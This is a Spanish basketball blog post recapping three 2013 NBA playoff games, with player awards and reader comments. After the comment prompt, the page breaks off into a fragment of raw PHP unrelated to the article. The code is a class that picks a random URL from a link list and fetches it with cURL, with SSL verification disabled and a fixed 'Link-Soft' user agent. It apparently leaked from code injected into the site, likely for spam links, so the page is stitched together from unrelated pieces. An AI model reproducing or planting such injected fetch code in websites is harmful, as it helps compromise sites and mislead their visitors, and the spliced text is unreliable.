La crónica: Warriors On Fire

24 de April de 2013 por MagicJohnson32

steph curry denverArrancamos el repaso a la cuarta madrugada de los Playoffs 2013 en Denver, donde Nuggets y Warriors ofrecieron un magnífico espectáculo digno de encabezar todas las crónicas. Especialmente brillante estuvo Stephen Curry, estelar en la victoria de los suyos en el Pepsi Center, donde nadie se iba con un resultado positivo desde el 18 de enero. Para acabar con esa racha de 24 triunfos locales consecutivos en Denver, los Warriors desplegaron todo su arsenal ofensivo, que en ausencia de David Lee incluyó a Jarret Jack de inicio. Así, los cuatro máximos anotadores del partido fueron visitantes: Klay Thompson (21), Harrison Barnes (24), Jack (26) y, por supuesto, Curry, que a sus 30 puntos añadió 13 asistencias. Ante el (ojo, no es una errata) 65% de aciertos en tiros de campo de los Warriors, no bastó con los buenos números que presentaron muchos de los locales. Seis jugadores de los Nuggets anotaron en dobles figuras y Kenneth Faried reapareció, pero el brillo de Curry eclipsó todo lo demás y equilibró la serie, que se traslada a Oakland con 1-1 y la promesa de que nos vamos a seguir divirtiendo. (131-117)

En el Este, los Playoffs no se tratan de diversión sino de eficacia, y en Miami saben bastante de eso. Qué poco están necesitando los Heat para dejar en evidencia la predicción de Brandon Jennings. Anoche les sobró con un parcial de 12-0 en el inicio del último cuarto para inclinar el marcador definitivamente del lado local y apuntarse el segundo encuentro de la serie. Chris Andersen volvió a electrificar el juego y fue el protagonista absoluto en ese tramo del partido, durante el que los Bucks echaron por tierra la labor de los tres cuartos previos. Hasta entonces, entre Ilyasova, Sanders y Dunleavy se las estaban apañando para mantener a Milwaukee con opciones pese a que Ellis y Jennings evidenciaban, una vez más, que no son escaladores para semejantes montañas. LeBron dominó aunque sin la precisión de otros días y Wade nos dio motivos para pensar que llega listo a las citas cruciales de la temporada. La serie viaja a Milwaukee con un 2-0 y probablemente el AmericanAirlines Arena de Miami no volverá a alojar un partido hasta la segunda ronda. (86-98)

celtics benchEn el Madison Square Garden, los Celtics vivieron su particular día de la marmota, versión 2.0: tras una primera mitad más que digna, que invitaba a contemplar una victoria de Boston en NY, los verdes se vinieron abajo ofensivamente en la reanudación y acabaron aplastados por los Knicks. Carmelo Anthony sigue a lo suyo y anoche se fue hasta los 34 puntos, bien escoltado por Felton (16) y JR Smith, que celebró su galardón como mejor sexto hombre con 19 puntos. Y si en los Heat destacábamos a Birdman Andersen, por parte knickerboker hay que rendirse ante Kenyon Martin, que dejó su huella en los pocos minutos que estuvo en cancha (11 rebotes, 4 tapones y 3 robos) y fue esencial para dejar a los Celtics en un pésimo 19% en tiros de campo durante la segunda mitad. Si Doc Rivers no encuentra remedio a semejantes pájaras, entonces es posible que no lo haya, aunque uno no puede evitar acordarse de Rondo en estas situaciones. Con un 2-0 en la eliminatoria, es momento de que Boston obre uno de sus milagros. (71-87)

PREMIOS

MVP: Exhibición de Stephen Curry en el Pepsi Center de Denver. 30 puntos, 5 rebotes, 13 asistencias y 3 robos. ¿Somos conscientes de que Curry no jugó el All-Star?

Rookie: Harrison Barnes debutó como ala-pívot y lo hizo con nota. 24 puntos y 6 rebotes para un jugador con un gran futuro.

Sorpresa: En “ausencia” de sus principales figuras, fue Mike Dunleavy Jr. el que mantuvo vivo a los Bucks con sus 16 puntos, 5 rebotes y 6 asistencias. Por su parte, Kenyon Martin se convirtió en factor diferencial en su partido frente los Celtics con sus 11 rebotes, 4 tapones y 3 recuperaciones.

Decepción: Monta Ellis y Brandon Jennings no estuvieron nada finos de cara al aro. El primero se quedó en 7 puntos con un 2 de 7 en tiro y el segundo en 8 puntos tras fallar 12 de sus 15 lanzamientos. Lo de los Celtics en la segunda parte es aún peor que una decepción: 23 puntos con un 19,4% de acierto.

Esfuerzo en vano: Ty Lawson (19 puntos y 12 asistencias) y Andre Iguodala (18 puntos, 4 rebotes y 7 asistencias) cuajaron un buen partido pero no pudieron hacer nada ante el bombardeo que se les vino encima.

Resumen de la jornada:

Próxima madrugada:

  • Rockets @ OKC Thunder (1h00)
  • Hawks @ Pacers (1h30)
  • Lakers @ Spurs (3h30)

Imágenes | AP Photos / Getty Images

Comenta

13 comentarios a esta entrada

  1. jonnyy dice:
    #1

    Ahora quiero ver a los que decían , que Warriros este año no jugaba ni los playoffs
    Veremos a Denver ahora, con dos partidos en el Oracle, que va a reventar

      Citar

  2. Viva_Dirk dice:
    #2

    El partido de Curry es brutal, los 30 puntos casi que fueron lo de menos. El solo provocó montones de tiros fáciles para el resto, no parece conocer la diferencia entre dificil y facil si se trata de hacer cualquier cosa dentro de una cancha de basket.

      Citar

  3. Jose Luis dice:
    #3

    Los árbitros están maltratando a Howard en esta serie. El poder del llorón de Duncan…

      Citar

  4. Jose Luis dice:
    #4

    Si los árbitros siguen así de caseros toda la serie, acabará 4-3, no me cabe ninguna duda.

      Citar

  5. Jose Luis dice:
    #5

    A 6 tras robo y triple de Blake. Howard ya con la 4ª falta.

      Citar

  6. Jose Luis dice:
    #6

    otra absurda falta pitada… los Lakers intentan presión a toda cancha timidamente.

    2 faltas Jamison en 14 segundos, y en ninguna de las dos ha tocado al jugador rival…

      Citar

  7. Jose Luis dice:
    #7

    de nuevo a 8 tras festival de tiros libres local y triple Jamison

      Citar

  8. Jose Luis dice:
    #8

    Qué poco usan a Nash & Clark como pick & pop, dio buen resultado en temporada regular…

      Citar

  9. Jose Luis dice:
    #9

    10 abajo al último cuarto. Los Lakers como los Celtics, le falta anotación para poder competir.

      Citar

  10. Jose Luis dice:
    #10

    por favor en serio ni una falta en esa jugada… Nash penetra, el rebote le cae a Jamison, se levanta en la zona, falla, saca el balón hacia Nash, dos jugadores al suelo, pilla el balón Jamison otra vez y el pase llega a Clark quién no puede cogerla luchando con Leonard, y tampoco hay falta? uf

    70-84, visto para sentencia. Los Spurs cerraron bien los dos primeros cuartos y han abierto bien el 3º y el 4º

      Citar

  11. Jose Luis dice:
    #11

    Gasol me mata con los tiritos de 5 metros… y ahora ha dado un balón a Howard cuando estaba siendo doblado en el poste, ostrás tiene que haber alguno libre (MWP en la esquina).

      Citar

  12. Jose Luis dice:
    #12

    Y el triple de Bonner (porculero como diría Denise) para ponerse a 17.

    Lo dicho, veré los 3 del Staples que si los árbitros siguen así los ganarán los Lakers, y veré el 7º por si hay conjunción planetaria.

      Citar

  13. GreenPride dice:
    #13

    Enorme victoria de los Warriors en Denver con 65% de acierto. ¿Estamos de broma? La clave sin duda el ametrallamiento desde el exterior de Curry, Barnes, jack y Thompson que hizo abrirse cada vez más a la defensa?? de los Nuggets y al final su zona también era un coladero. Sin Lee sigo pensando que acabarán cayendo pero sin duda esta tiene pinta de ser una serie entretenida. Karl tendrá que decirle a sus chicos que si te meten 131 puntos en Playoffs va a ser que no tienes nada que hacer.
    Mientras los Heat siguen a lo suyo, ajustando motores para otros momentos de PO, los Celtics volvieron a darse el batacazo en la segunda parte al igual que en el primer partido. Primer tiempo muy bien jugado con Green y Terry (sí sí el Jet) martilleando a los Knicks junto a Pierce y con gran defensa sobre Melo para hundirse totalmente en el segundo tiempo haciendo la peor marca anotadora de la franquicia en una mitad en un partido de Playoffs. Sin Rondo los colapsos seguirán y no parece fácil que puedan equilibrar la eliminatoria en Boston pero ya sabemos que el Garden a veces obra milagros así que habrá que seguir atentos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>